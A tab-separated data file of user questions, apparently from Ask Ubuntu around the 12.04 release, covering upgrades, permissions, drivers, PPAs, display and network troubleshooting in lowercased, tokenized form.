123370	changing the permissions in root files without sudo from recovery	hi i recently killed my etc folder by running : sudo chmod etc 417 . due to sudo being in that folder it can not be accesed now , so i have to change the permissions back to the correct ones using the recovery menu . in recovery i tried this from recovery : root @ joeri-virtualbox : / # chmod 755 etc chmod : changing permissions of 'etc ' : read-only file system root @ joeri-virtualbox : / # cd etc root @ joeri-virtualbox : /etc # ls -ld drw-rw-rwx 139 root root 12288 2012-04-19 16:29 even when i am root i can not change it because it is read-only . how do i change these permissions ? thanks joeri .
123371	is it possible to change the desktop environment in ubuntu 11.10 ?	i just want to ask if it is possible to change the desktop environment in ubuntu 11.10 and how to do it . thanks in advance .
123381	how do i add customized wallpapers so they appear in the dynamic unity greeter ?	as the title above suggests i want to add some custom wallpapers ( png images i have created myself ) to the user/share/backgrounds folder in 12.04 . i have completed this task . issue : they do not appear in the desktop appearance for selection ( i am assuming if they did appear here they would be the default background in the lightdm dynamic unity greeter . only the `` contest images '' work with unity greeter . i came across the links below which are similar but to not resolve my question how do i add new wallpapers ? ( refers to 11.10 only ) how do i change the wallpaper in lightdm ? ( shows only how to turn off dynamic unity greeter and assign a fixed background for lightdm after some thought this may also be a permissions issue . the reason for suggesting is that i copied a theme folder using sudo nautilus . the theme did not appear in `` advanced settings '' for selection . to make this theme work in unity i copied it to ~.themes . i copied the bankgrounds using the same method
123382	zebrex 3151hs usb barcode scanner missing character	i am using zebex 3151hs barcode scanner . there is no problem on windows . but i have some problems on ubuntu 11.10 . for example : on barcode : `` example2012 '' after scan : `` example201 '' another example : on barcode : `` jetrend2012 '' after scan : `` jetrnd201 '' how can i fix it ? how do you think about it ? thanks for your help !
123388	how do i remove lubuntu desktop from ubuntu 12.04 ?	when i installed ubuntu 12.04 beta 2 on my computer i also added the lubuntu desktop to try using the following command : sudo add-apt-repository ppa : lubuntu-desktop/ppa sudo apt-get update sudo apt-get install lubuntu-desktop how do i remove lubuntu and restore my unity configuration ? how do i remove lubuntu-desktop ? this link applies to 11.10 only
123392	how can i customize vim for web development and programming ?	i tried already to find something for my question in [ askubuntu.com ] , but nothing was answering my needs . so , what i want is build vim as a very powerful and useful editor for html , css , javascript , etc but for programming too . i am trying to learn css and generally i wanted a very nice editor with many plugins . so , can anybody help me , step by step , for customizing vim and about what features to look around that might help me in my learning period ? thanks oh , and the only way that vim is running is from terminal ? thanks ***edit -- - > i can not find my.vimrc file
123399	i keep losing the internet connection in ubuntu 11.10	i recently assembled a new desktop with an asus pce-n15 wireless network adapter and my home wireless network is detected and i am able to connect to it and even access the internet . however , after little time i lose the internet connection , not the wireless connection to the home network , and have to manually disconnect and reconnect in order to get internet working . anyone has any ideas ? update : /var/log/messages apr 19 13:46:50 videl kernel : [ 13415.875472 ] rtl8192c : loading firmware file rtlwifi/rtl8192cfw.bin apr 19 13:58:08 videl kernel : [ 14093.833899 ] cfg80211 : calling crda to update world regulatory domain apr 19 13:58:08 videl kernel : [ 14093.913925 ] cfg80211 : world regulatory domain updated : apr 19 13:58:08 videl kernel : [ 14093.913926 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 19 13:58:08 videl kernel : [ 14093.913927 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 19 13:58:08 videl kernel : [ 14093.913929 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 19 13:58:08 videl kernel : [ 14093.913930 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 19 13:58:08 videl kernel : [ 14093.913932 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 19 13:58:08 videl kernel : [ 14093.913933 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 19 13:58:13 videl kernel : [ 14098.456988 ] rtl8192c : loading firmware file rtlwifi/rtl8192cfw.bin update 2 : the result of running ip route list with and without internet connection is the same : default via 192.168.1.1 dev wlan0 proto static 169.254.0.0/16 dev wlan0 scope link metric 1000 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.7 metric 2
123403	adjust terminal - ( arch-like info-screen )	i use ubuntu for many years but recently i discovered a nice feature in arch . it is common to display system-information on headless servers on ssh-login , on ubuntu its the landscape- package . i wounded if it 's possible to create the same for the normal terminal in ubuntu . like the terminal in arch i think it might be useful to have this information displayed , at the time one starts the terminal . is it possible to create something like this for the terminal , and if so what would you suggest ? i tried motd but these messages were not displayed . daniel
123405	how to convert alac to flac ?	i have some alac files ( .m4a ) that i want to convert to flac ( .flac ) . how can i do this ?
123407	gnome 3 title bar lost when maximized !	please help . i uninstall compiz and it wo n't work please help : ( img :
123410	clean install of 12.04 over old 10.10 and only format some partitions	i want to install latest ubuntu 12.04 , once it gets released , on top of my actual 10.10 . the main reason is that i get the `` not supported '' message , and can not upgrade to newer distributions through update manager , because i could never solve some errors , so i want to do a fresh install please help me with some questions : 1 ) how should i do to reinstall 12.04 over my 10.10 without erasing /dev/sda3 contents , which stores all the backup info ? ( see image ) 2 ) are the partition sizes shown ok or should i increase/decrease any ? 3 ) is ok to format only /usr /var /tmp and /home ? should i format another to do a clean install ? 4 ) what will happen with grub and other things when i install 12.04 over actual 10.10 ? should i remove grub before launching installation ? thanks a lot in advance ,
123411	save *.deb files from var/cache/apt/archives folder for future installation	how can i store away the *.deb files from var/cache/apt/archives directory for future installation in case i need to reinstall the os in ubuntu 11.10 . i tried copying and saving away but after os reinstallation i tried reinstalling those deb files using `` apt-get install file '' but so many files were missed thought i copied everything . what am i missing , please reply
123419	'invalid or corrupt kernel image ' error while booting from usb stick	i got the ubuntu 11.10 32-bit edition and i used unetbootin to write the iso to a usb stick.after that i tried to boot from the stick , having changed the bios boot settings , and when the first interface shows up with the choices of istallation , whatever choice i select i got the message '' invalid or corrupt kernel image '' .i use a netbook with windows 7 on it.i tried different usb sticks but same again.i also tried universal usb installer instead of unetbootin but same again.any idea of what happens ? i am using asus 1000h.the usb does n't work in one more pc i tried to , but i also tried a second usb to both of the two computers and same again . i downloaded the iso image once again and follow the same procedure but same again
123421	proxy setting under xfce within virtual machine	my ubuntu is within a virtual machine . when i log in with a ubuntu session , the web browser works fine . but when i log in with a xfce session , the web browser does not work ... i try to change proxy setting , it gives me : when running google chrome under a supported desktop environment , the system proxy settings will be used . however , either your system is not supported or there was a problem launching your system configuration . but you can still configure via the command line . please see man google-chrome for more information on flags and environment variables . could anyone help ?
123424	what is the deal about ubuntu	my husband is an ubuntu believer . can someone please explain to me what he sees in it , i ca n't figure it out , especially the ubuntu one . also , we use ubuntu one but can only make one iphone file for pictures . anyway to put folders for both of us ?
123433	where is the shared folder of host machine ?	i have installed ubuntu as virtual machine under mac , by vmware fusion . i have already configured vmware fusion to share a disk of mac ... but i still ca n't see the disk in the file manager ... should i do something to mount the disk ?
123438	align columns right	for the command shell , is there a common program like column that has an option to align specific or all columns to the right , if not also detect numeric fields and do so automatically for those ? otherwise what might be the most concise way with text-processing commands ? example space-delimited input already piped through | column -t : tvn 20120419 10.08 10.08 9.15 9.6 1630000 9.17 20120419 4.6 83.88 7376600 -0.21858 integerpl 20120419 143.1 148.9 140.3 142.5 2910 138.53 20120405 4.32503 5.55 1642500 1.26158 jsw 20120419 93.55 94.4 91.25 92.7 116000 90.07 20120329 3.86997 8.54 13155770 1.29315 kernel 20120419 73.7 74.9 72.9 74.1 56200 71.8 20120404 3.48432 10.71 2819790 1.50892 eurocash 20120419 39.49 41.99 39.01 40.73 812000 38.05 20120328 4.85095 20.21 5280548 2.46091 pekao 20120419 145.9 147.8 144.0 145.5 292000 140.2 20120404 3.70615 5.48 68858748 2.63889 pknorlen 20120419 38.0 38.5 37.25 37.35 1230000 36.26 20120329 4.15476 21.21 104607200 2.65772 notice readability issues esp . where differences between records are by several magnitudes ( like 2nd last column ) . incidentally , formatting prices to always show n decimal places is a problem of its own . but i 've used awk 's ofmt= '' % .4f '' for that .
123441	how do i install a .tgz file in ubuntu 10.11 ?	i 'm trying to install `` sunflower '' file browser app in ubuntu . i downloaded the installer and it 's a .tgz file . how do i install it ? can somebody walk me through the steps from de-compressing to what must be keyed in to the terminal and where must i place the installation folder . the file is saved on home folder , under a folder called `` downloads '' . i renamed the compressed file to just `` sunflower.tgz '' and moved it on the home folder . i typed `` tar xfvz sunflower.tgz on terminal but ca n't find the file . is it because i renamed it ?
123448	good dual monitor 10.04 video card ?	working with a single monitor is getting old and it was a bit of a pain getting the intel sandy bridge integrated graphics working with 10.04 . what is a good 10.04 plug and play dual monitor video card with 2 hdmi ports ? it will be used with 2 viewsonic vx2450wm-led monitors at 1920 x 1080 . it wo n't be used for high performance apps like gaming but may be used to stream video .
123455	is there a way to set app icons to top menu bar . ( near clock , charge etc )	i want to see my favorite applications on top menu bar . is there a way to set app icons to top menu bar . ( near clock , charge etc ) . in ubuntu 11.10
123457	changing shell theme in without gnome tweak tool	how do i go about doing so ? gnome tweak tool wo n't launch under gnome 3 and i want to know if there is any other way of changing the shell theme . thank you .
123459	is there a spiceworks replacement or similar for ubuntu ?	i am looking for something like spiceworks , but for ubuntu . if you are not sure what spiceworks is , it is a piece of software that runs on a computer and tells you what kinds of devices are on your network and all kinds of information about those devices . any suggestions would be appreciated .
123461	how can i make clicking notify-osd notifications bring me to their application/message ?	i would like to be able to click on a notification so that the app opens and shows the message . say i get a pidgin message , a click on the notification should open the pidgin message window and show the message so that i can quickly answer . the same goes for email notifications and thunderbird and so on . either the entire notification field should be clickable or there should be a button . is there any way i can get this feature ?
123465	turn off laptop display and have monitor	my laptop display has stopped working and is unfixable ! anyway , i got a full hd monitor and plugged that into the hdmi port of the laptop . i have changed the power settings so that i can close the lid and still have the monitor on , and this all works . however because it is on `` mirror displays '' , i can not get the full 1080p resolution that the monitor supports , and when i turn off mirror displays and switch off the laptop screen , the monitor will also switch off ! i 'm really stuck , as i can only get the monitor to display its full resolution if i have it with the laptop screen turned on , and i dont want this because ( as the laptop display does not work ) things get lost on that side of the screen . help . ( dell studio 1537 monitor is samsung sa300 connected through hdmi ubuntu 11.10 )
123467	getting touchpad working on macbook air	i recently installed ubuntu on my new macbook air 4,2 ( mid 2011 ) . everything has worked great so far , with a few minor issues with screen resolution . however , i am now completely stuck on how to get my touchpad to recognize gestures such as scrolling , tap to click , and right click . i have run the post-install script here , tried installing xserver-xorg-input-synaptics through apt-get and also through synaptic package manager . so far nothing has helped and when i run synclient as a test i get a message saying `` could n't find synaptics properties . no synaptics driver loaded ? '' . i added the link ppa : mactel-support/ppa to my software sources . when i run sudo apt-get install xserver-xorg-input-synaptics , i get a pretty lengthy error message : error ! /usr/src/usbhid-0.11.2.dkms.tar.gz does not exist . dpkg : error processing usbhid-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of bcm5974-dkms : bcm5974-dkms depends on usbhid-dkms ; however : package usbhid-dkms is not configured yet . dpkg : error processing bcm5974-dkms ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : usbhid-dkms bcm5974-dkms e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ' this leads me to believe that i need to install usbhid-dkms , however searching has yielded no results . any help with this would be greatly appreciated .
123469	i 'm stuck between 11.10 and 12.04 with only a read only system	i was trying to update to 12.04lts from 11.10 and went out of the room . when i came back my laptop went into sleep mode . i assume that it was half way through updating something . the screen would be black but would flash up with my background if i moved the mouse or pressed a key on the keyboard . i restarted my computer and when i booted up the ubuntu partition i was told that 'glibc_2.14 ' is not found and is needed for '/lib/libply.so.2 ' . then i was booted into some kind of recovery shell ( i 've forgotten exactly what it is called ) . from where i tried to see if the system could just pick up where the upgrade left off . i typed 'do-release-upgrade -d ' but simply go something close to ' [ errno 30 ] read only file system when trying to access '/root/.cache/update-manager-core '' ( note note the exact wording ) . from where i went onto the windows partition ( everything seems as normal ) . then went back to ubuntu in recovery mode and tried to recover packages with dpkg . it ran and said that to fix some problems i would need to manually run 'dpkg -- configure -a ' . i went to the recovery shell and tried this and got that i could n't do it because of a 'read-only file system ' . i 'm running a hp pavilion dv6 which started with windows 7 and i added ubuntu on after a while . note that sudo does n't do anything in the recovery shell . any help would be welcome , thanks .
123474	how do i use a ntfs drive as location for music , videos etc ?	i have a windows/ubuntu dual boot system , using three drives . drive1 contains windows , drive2 contains downloads , music , videos and so on , drive3 contains ubuntu . i would like to have drive2 mounted automatically ( assuming i have to edit fstab ) , the real question is if there is anyway i can store some ( not all ) of ubuntu 's `` standard home folders '' for example have downloads and videos there . would this be possible ? i
123475	keep calculator from opening a new window every time i press the `` calculator '' button on the keyboard ?	currently what happens : i press calculator button on my keyboard , and calculator pops up . no problem there ! next , after my calculation , i click back to the window where i 'm inputting the calculation , and when i press the calculator button again , a new window opens in the calculator program . what i want to happen : when i click the calculator button , it switches back to the calculator program if it 's already open , else , open calculator program . i do n't want it to open a new window every time i try to change back to my recent calculation . it 's not a big deal , obviously , just a slight annoyance to me so far . is there a setting , or some terminal command i can run , or anything i can do to change it ? thanks !
123484	default font size	so i downloaded advanced settings from the ubuntu software center and i was playing around with the font sizes when it lagged and it got stuck at the largest font size . so , i ca n't open any programs such as advanced settings anymore because the fonts too big , and i need to find a way to default the font or make it smaller so i can use the computer again . i do have access to the terminal - but thats about it . thanks to any help .
123485	double launchers and mouse captured between screens in twinview configuration	just upgraded to 12.04 and noticed an extremely annoying issue . while using twinview , there now appears to be a launcher on each screen . moving the mouse between monitors and over the launcher `` captures '' the mouse for half a second or so , creating the perception of lag . according to some bug reports i 've read it appears that a launcher on every screen is a new `` feature '' . is there any way i can get rid of the 2nd launcher ? it 's driving my crazy .
123493	screen went black	i 'm new to ubuntu.. i 'm not sure what just happened , but the screen just went black with the text : ubuntu 11.10 `` my computer name '' tty4 and i was asked to log on . it happened when i closed chrome ( alt+f4 ) . this is the second time it has happened , and i cant make it go away : ) even if i log on . only thing that works is to press ctrl+alt+delete , which makes my pc restart . any idea what is causing this ?
123511	when using ubuntu on a live cd or usb , how can i determine if a different , inactive install is 32 vs 64 bit ?	i was not able to determine by searching whether this question has already been asked and answered . my search always turned up some other 32 versus 64 bit question . i want to know if it is possible to determine whether an inactive ubuntu install , that is , on a drive you did not boot from , is the 32-bit or 64-bit version . i can not use uname -m because the ubuntu i want to know about is not the ubuntu which is running . for example , if ubuntu is installed on the hard drive of a desktop pc and the pc is booted from a live cd/usb version of ubuntu is it possible to tell what is installed on the hard drive just by looking at the file system of the ubuntu on the hard drive ?
123520	howto add diashapes to dia	i downloaded the diashapes.deb package from http : //dia-installer.de/download/linux.html . i installed the deb-file , but the objects do n't appear in dia . where are they ? ? ? ? thank you in advance chris
123522	afterv upgrade of 11.10 to 12.04 my laserjet 5p did not work	tried $ sudo modprobe usblp that helped for the 11.04 version but does not work here . hardware is 64 bit , i3 cpu530 @ 2.9 ghzx4 , message is printer not connected
123524	this update does not come from a source that supports changelogs	when i get an update via update-manager for a software like blender/vlc , i like to see what has been fixed/changed . but the software updater does n't show me the changes from a ppa added software . i added the ppa for blender/vlc ( this only applies to the software i added a ppa for ) sudo add-apt-repository ppa : cheleb/blender-svn sudo apt-get update sudo apt-get install blender and vlc like this . sudo add-apt-repository ppa : videolan/stable-daily sudo apt-get update sudo apt-get install vlc and when i run update-manager , or update manager pop-ups i see that vlc/blender have updates but , i ca n't see what has been changed/fixed this is the message i get , the screenshot below is for mupen but it 's the same thing . ( i updated vlc and blender , did n't wan na wait for the next update ) this update does not come from a source that supports changelogs . ( by the way i have a dutch ubuntu , so the above text i google translated it ! ) it only shows which version you have and to which version you be upgrading to . so my question is , how do i get the change-log tab of update-manager working . if it 's even possible ?
123526	how do i get rid of an annoying ( repeating ) download pop-up in firefox ?	i downloaded vb0x extension pack and installed it last week and it works like a dream . my problem is every-time i open firefox v11 the download prompt opens asking me to download the vb extension pack again . how do i get rid of it ?
123533	how can i fit 2 commands in 1 terminal shortcut	10 latest updates and drivers and i need to run a game called unreal tournament , but in terminal it requires 2 commands the first one is to mount into the folder : cd /usr/local/games/ut2004/ and then the second one is to open the actual game : sudo aoss ./ut2004 in one shortcut i can only fit 1 command but both do n't fit in is there any way i can turn these 2 commands into one ? perhaps turni9ng on the desktop shortcut already mounted into the folder ? any help would be really appreciated because im getting kinda sick of using the terminal to run it every time .
123538	`` additional data from the script executed '' message in inkscape	this is very irritating . i 'm using ubuntu oneiric and when i use inkscape and make a couple of copy-paste operations inside the image , i get the following popup message : inkscape has received additional data from the script executed . the script did not return an error , but this may indicate the results will not be as expected . the fantastic lxml wrapper for libxml2 is required by inkex.py and therefore this extension . please download and install the latest version from http : //cheeseshop.python.org/pypi/lxml/ , or install it through your package manager by a command like : sudo apt-get install python-lxml i tried updating the python-lxml package ans it 's no use . any other solution
123539	network manager does n't find my wired conection	there is no problem to connect to my wireless network , but when i want to change it to wired connection the manger ca n't find the connection . there is green light in the socket when i connect the cable . so how can i fix this problem ? i am using ubuntu 10.04 netbook version and my computer is a hp mini 2140 . thanks for any help : )
123542	ecryptfs-setup-private login passphrase incorrect	i 'm trying to access my former home folder . when i run ecryptfs-setup-private , i am asked for my login passphrase which returns error : your login passphrase is incorrect . i have tried both , my login-pw for that account , and the home-folder pw ubuntu gave me after installing it . what can i do ?
123546	`` /usr/bin/ld : can not find -lboost_python-mt '' error when installing pycuda 2011.2.2	i am installing pycuda2011.2.2 on ubuntu 11.10 , but ca n't complete it . when i do pycuda-2011.2.2 $ make -j 4 i get this error : /usr/bin/ld : can not find -lboost_python-mt , /usr/bin/ld : can not find -lcuda i got 1 exact problem match in google search and solution as well : $ sudo ln -s /usr/lib/libboost_python-mt-py26 /usr/lib/libboost_python-mt but booooom , my problem does n't vanish . it makes me wonder that why there are no relavant results in google search , as if only i have this problem . what is wrong ? any help is appreciated . thanks ,
123547	ports misbehaving - closed but they are opened	i have an interesting problem for you . i have a few ports that i opened up . on my router and i allowed then on my firewall too with sudo ufw allow 30999 . but still the application which would use it , for example ssh server , still ca n't . and if i go to an open port checker site it still says that the port is closed . so i ran out of options . i did the usual . i restarted and stuff like that , but nothing seems to help . this is an kubuntu 12.04 32 bit . updated machine . wireless connection with a sky broadband router in the uk . thanks ! ! !
123550	how to open a folder in new tab in dolphin from command-line ?	i want to open folders with kupfer ( wiki ) in a new tab of dolphin file manager but ca n't find a way . i suppose the next thread can help solving this : open new tab in existing konqueror from command line
123552	unity launcher on right side	ok , i see there was a couple of posts asking to move unity to right side . they were closed as they were considered and `` exact duplicate '' and no other info . one did have some other info , but was a thread talking about it being put to `` another side of the screen '' , but in actuality was just talking about moving it to `` the bottom '' like windows . that thread gave a somewhat reasonable rationality for not doing so as it was to save vertical real estate . moving it to the right however , does not violate this rationality . there were others asking if it could be moved , and the answer was just a flat `` no '' or use something else . so i 'm going to post this asking for the ability to give the user the choice to have the unity launcher on the left or right . and if not , why not . design decisions need to be backed up or they are meaningless and just get people upset .
123553	how to install google appengine ?	how can i install google 's appengine in ubuntu 12.04 ? is there an easy method to install it with all dependencies ? is there a ppa ?
123557	set boot option to hotkey in grub ?	i want to set grub to boot up a particular option ( eg , a different kernel version , different os ) when a certain key is pressed ( eg , w to boot up windows with ubuntu as default and l for lubuntu ) . is there a way to do this ?
123558	dolphin kde like column design for nautilus or an alternative file browser	i 'm now an ubuntu user for several years but a friend of mine has kubuntu installed and although i 'm no fan of kde i really liked the file browser `` dolphin '' . especially the mac osx like `` columns design '' with the preview at the right side . like here http : //img23.imageshack.us/img23/7531/screenshotlibevent004do.png . are there any simple solutions to get this design in nautilus - my search was n't very productive till now . usually there is no alternative to installing a new file broswer , but i 'm not sure if its worth it . does anybody use dolphin or anything similar under ubuntu and could share some thoughts ? greets .
123565	logging ssh clients session	i need to implement a secure server to be the only source for connecting to routers and switches in the lan . the only task that that is getting me trouble to solve is the requirement to log all the users actions in the server ( and the routers ) . i 've trying with ttysnoop , but ca n't autostart the log to file when a user log in . ther is a way to accomplish this ? ( sorry for my english )
123566	how do i import contacts from gmail into ubuntu one ?	can contacts from g-mail accounts be imported into ubuntu one ? ubuntu one has a contacts sync . i want to sync my contacts from ubuntu one w/ gmail . from g-mail contacts > > to ubuntu one contacts
123567	how can i avoid ubuntu from asking for a password after the laptop 's lid is opened after closed	dear lovely ubuntu users , when i close the lid of my laptop down , and then open it , it asks for a password . obviously i know it , but i do not want that any more . i am also getting used to 12.04 so some help would be much appreciated !
123568	usb boot is skipping and reverting the hdd	i installed ubuntu 11.10 to a 16gb usb drive ( kingston datatraveller g3 ) , i know it is fully functional as i have tested after disconnecting my hdd . my bios has all other devices in a higher priority than the hdd , with the usb hdd as the first . it boots fine without stalling when the hdd is out , yet when in , the usb drive is completely ignored . i am aware this may be an issue unique to my hardware ( emachines-e525 ) or software/bios ; is there anything i can config in the usb installation to make the bios recognise it ?
123579	where is my software center ?	i 'm an ubuntu newbie . have already used software cenetr to install a few stuff , but this week i went looking for it and ca n't find the program anywhere : -/ i 'm sure i must be doing something wrong but ca n't figure out what it is . ca n't find a program listing in ubuntu . software center is not in the applications menu and i have no idea where else to look . anyone can help please ... ?
123580	ubuntu one sign in with windows client fails	i am trying to use ubuntu one with windows 7 but ca n't seem to sign in during intsallation . i always get the error message `` the authentication failed '' and when i try to reset my password i get `` sorry we did not recognize the email address . '' i tryed two different accounts and two different machines with windows 7 64bit . ubuntu one is not blocked by the windows firewall . it works when i log in via internet and with ubuntu since 10.04 up to now ( 12.04 ) . anyone got any ideas ?
123587	upgrade ended half-way between ubuntu 11.10 and 12.04 , how to full upgrade ?	i was trying to upgrade this afternoon from 11.10 to 12.04 . after most of the packages had been downloaded , i lost my internet connection . when i re-connected to the internet , still on ubuntu 11.10 , software update showed me a huge ammount of updates to perform ( because it hald already altered the software sources and ppas to 12.04 ) . well , i performed all the updates . now , i have an ubuntu that is half-way between 12.04 and 11.10 . it identifies itself as 12.04 , but its mostly 11.10 . when i try update-manager -d , i get the message not all updates can be installed , run a partial upgrade to install as many updates as possible . then , if i click `` partial update '' i get the following error : `` an upgrade prom precise to oneric is not suported with this tool '' what is happening ? is there a way i can fix this ? perhaps changing all the software sources to 12.04 's ? i do n't want to do a fresh install , cause i want to keep all my installed software and all my settings !
123592	bitcoin ppa installation problem	im trying to download bitcoin for my ubuntu oneiric . sudo add-apt-repository ppa : bitcoin/bitcoin sudo apt-get update sudo apt-get install bitcoin/bitcoin everything goes smooth until the install line . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package bitcoin help ! i 've never done a ppa before !
123598	why does dpkg give me a `` package was interrupted '' error ?	when i try install or remove a software through the terminal , i receive dpkg package was interrupted and further if i use software center to install the same , i receive ttf-mscorefonts-installer errors i tried to solve the same using sudo apt-get update & & sudo apt-get upgrade and i receive e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/
123604	how do i make screen dimming work in ubuntu 12.04 ( beta 2 )	i recently installed ubuntu 12.04 ( beta 2 ) on my hp mini 110-4117 , but i cant control screen brightness . the fn + f2 , fn + f3 keys do n't work . system settings > brightness and lock does n't provide any means of controlling screen brightness . how can this be fixed ? thank you .
123610	how to install thinkingrock v2.2.1 ?	http : //www.trgtd.com.au/index.php ? option=com_content & view=article & id=45 & itemid=58 # linux is the link for this java program for organising your projects/activities . java is working on my system . i know this as i 'm able to use jdownloader successfully . however attempts to install thinking rock have all failed . all the info i 've found appears out of date ( it is an old free version , to be fair ) . i did not have any luck adding either ppa source that i found to my software sources either via gui or in the command line . no , sorry that 's possibly misleading . i can add the software sources ( though perhaps wrongly ) but installing then gives an error after a long list of activity . ( see at end ) http : //ppa.launchpad.net/crazyscot/tr/ubuntu also salutis/ubuntu ( both oneiric main ) following instructions , thinkingrock ( nor thinking nor rock ) did not show up in synaptic search . command line methods did n't work either . to be frank i am still winging it when it comes to installing software on ( l ) ubuntu . almost completely clueless ! please help , somebody . i 'm sure it 's something pretty simple that i 'm doing wrong ! rob install error : err ... ppa.launchpad.net oneiric/main sources 404 not found err ... ppa.launchpad.net oneiric/main i386 packages 404 not found err ... ppa.launchpad.net oneiric/main sources 404 not found err ... ppa.launchpad.net oneiric/main i386 packages 404 not found err ... ppa.launchpad.net oneiric/main sources 404 not found err ... ppa.launchpad.net oneiric/main i386 packages 404 not found err ... ppa.launchpad.net oneiric/main i386 packages 404 not found ( ... replaces http : // )
123612	how do i set album artwork ?	my music goes back and forth from itunes to rhythmbox via dropbox . all of my songs have their artwork showing in itunes but some do n't when i 'm back in ubuntu . i do n't know how to set the artwork in rhythmbox and setting the file 's icon does n't really do anything . if it 's of any importance , the songs that do n't have their album artwork show in ubuntu also do n't have it show in windows explorer 's tile view . how do i fix this ?
123619	triple boot windows vista , ubuntu 11.10 , kubuntu 11.10	i 've installed ubuntu 11.10 from windows vista using wubi , on my secondary hard drive . i want to install kubuntu 11.10 in addition to windows and ubuntu on this secondary hard drive . it has 1 partition in ntfs . i 've already prepared a live usb key with kubuntu on it . what should i do now ?
123630	mysql error after rebooting ( lampp )	i do n't know if this is the right place to put this question . i installed lampp and followed this instructions http : //www.apachefriends.org/en/xampp-linux.html # 377 and everything worked fine until i rebooted the computer and this happened it can be because of i rebooted the computer while lampp was on . anyone that can help ? edit : i can run php files . it 's just phpmyadmin that does n't work and i get this in http : //localhost/xampp/ maybe this has something to do with it . jeggy @ jeggy-xps : ~ $ sudo /opt/lampp/lampp start starting xampp for linux 1.7.7 ... xampp : another web server daemon is already running . xampp : another mysql daemon is already running . xampp : another ftp daemon is already running . xampp for linux started . jeggy @ jeggy-xps : ~ $ sudo /opt/lampp/lampp stop stopping xampp for linux 1.7.7 ... xampp : xampp-apache is not running . xampp : xampp-mysql is not running . xampp : xampp-proftpd is not running . xampp stopped .
123632	how to setup remote desktop sharing ?	i am using ubuntu 11.04 and i want to know how can i access another one of my friends system using ubuntu 11.04 over remote desktop.i have installed openssh-server , now what will be the next step to access his system ? any help and suggestions will be highly appreciable.thanks
123635	7-zip error : extracting meta-inf/air/hash-unsupported method	i get this error when extracting an .air file of botanicula : this is the only error when extracting with 7-zip on xubuntu 11.04 7-zip 9.04 beta copyright ( c ) 1999-2009 igor pavlov 2009-05-30 p7zip version 9.04 ( locale=de_de.utf-8 , utf16=on , hugefiles=on,2 cpus ) processing archive : /media/h2sd/botanicula.air extracting mimetype extracting meta-inf/air/application.xml extracting meta-inf/air/hash unsupported method extracting botaniculalinux.swf extracting data/01/1_01.swf extracting data/01/1_02.swf extracting data/01/1_03.swf ... is this important ? does it mean , that the hash is not correct ? if so , how can i stop the 7-zip gui from deleting all it has already extracted due to this unimportant error ?
123637	some funny directories appeared in my home folder !	i 've recently installed ubuntu sever 12.04 , and i 've been having trouble with audio , and have been installing software to fix it . however , after rebooting my computer in ( a futile ) attempt at getting volumeicon to work , i 've found that my home directory has been populated with some directories that i am pretty sure i have n't created myself , and was n't there when i freshly installed it . namely , they are desktop , public , videos , documents , music , downloads , pictures , and templates . how did these directories get there ? is it something i installed ?
123638	canon multifunctional mg3150 - printer ok , but scanning is not	any ideas where the driver can be found or how to activate the scanner driver if it is hidden in the printer driver ?
123643	download acceleration with multiple connections	i 'm trying to find a good download manager that can open concurrent connections for a single download . i do n't mind whether it 's an extension ( i 'm using chrome ) , or an independent application . i have downloaded steadyflow , but it does n't seems to have an concurrent connections option .
123653	ubuntu 12.04 - lg flatronled e1941 - screen resolution issue	thanks for your time . i upgraded to ubuntu 12.04 from 11.10 . my screen resolution is stuck at 1366x786 . i have tried setting up higher resolution using xrandr command as explained here but it is not working . my previous question about 11.10 has remained unanswered for the long time and as this is for 12.04 , i have created this new question in the anticipation that the problem may be resolved in this lts version . out put of xrandr command is as follows : - screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 4096 x 4096 vga1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 410mm x 230mm 1366x768 59.8*+ 1024x768 75.1 75.0 60.0 832x624 74.6 800x600 75.0 60.3 56.2 640x480 75.0 60.0 720x400 70.1 1440x900_75.00 75.0 1440x900_74.00 74.0 output of lspci is as follows : - 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 01:05.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) please help , p.s . what is interesting is winxp on the same machine is able to see the mode upto 1600x1200 .
